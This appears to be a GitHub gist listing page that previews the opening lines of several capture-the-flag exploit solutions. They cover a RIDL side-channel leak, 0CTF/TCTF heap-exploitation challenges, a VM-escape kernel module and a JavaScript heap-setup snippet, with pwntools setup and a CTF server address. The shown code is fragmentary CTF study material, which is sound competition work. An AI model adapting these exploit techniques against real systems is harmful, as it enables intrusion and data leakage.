bird birdg0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf | |
| objcopy -Obinary -j .text solve.elf solve.bin | |
| Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c, | |
| https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c | |
| and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> |
birdg0
/ ridl.py
Created
November 4, 2019 08:45
— forked from mkow/ridl.py
RIDL (Google Capture The Flag 2019 Finals solution)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| import os | |
| def split_by(data, cnt): | |
| return [data[i : i+cnt] for i in xrange(0, len(data), cnt)] | |
| context.log_level = 'error' | |
| BEGIN_MARKER = '%$[' |
birdg0
/ applepie.py
Last active
February 20, 2022 07:02
Official solution for "applepie" of 0CTF/TCTF 2019 Quals
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from zio import * | |
| LOCAL = 0 | |
| while True: | |
| try: | |
| if LOCAL: | |
| io = zio('./applepie') | |
| else: | |
| io = zio(('111.186.63.147', 6666)) |
birdg0
/ vm_escape_0ctf2017_finals.c
Created
January 31, 2019 05:45
— forked from Eadom/vm_escape_0ctf2017_finals.c
Exploitation of vm_escape in 0CTF2017 Finals
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 0CTF 2017 finals | |
| // vm_escape | |
| // @Eadom | |
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| #include <linux/init.h> | |
| #include <linux/ioport.h> | |
| #include <linux/slab.h> | |
| #include <linux/string.h> | |
| #include <linux/delay.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var a = new Array(0x80000200); | |
| var b = new Array(100); | |
| for (var i = 0; i < b.length; i++) { | |
| b[i] = new Uint8Array(0x1000+i); | |
| b[i][0] = 0x11; | |
| b[i][1] = 0x22; | |
| b[i][2] = 0x33; | |
| b[i][3] = 0x44; | |
| } |
birdg0
/ keen_of_glory2.py
Last active
May 27, 2018 13:27
"Keen of Glory II" of 0CTF/TCTF 2018 Finals
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| LOCAL = 1 | |
| DEBUG = 0 | |
| VERBOSE = 0 | |
| if VERBOSE: | |
| context.log_level = 'debug' | |
| else: | |
| context.log_level = 'critical' |
birdg0
/ heapstorm2.py
Created
April 2, 2018 03:30
— forked from Jackyxty/heapstorm2.py
Official solution for "Heap Storm II" of 0CTF/TCTF 2018 Quals
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # encoding: utf-8 | |
| #flag{Seize it, control it, and exploit it. Welcome to the House of Storm.} | |
| import itertools | |
| from hashlib import sha256 | |
| from pwn import remote, process, ELF | |
| from pwn import context | |
| from pwn import p32,p64,u32,u64 |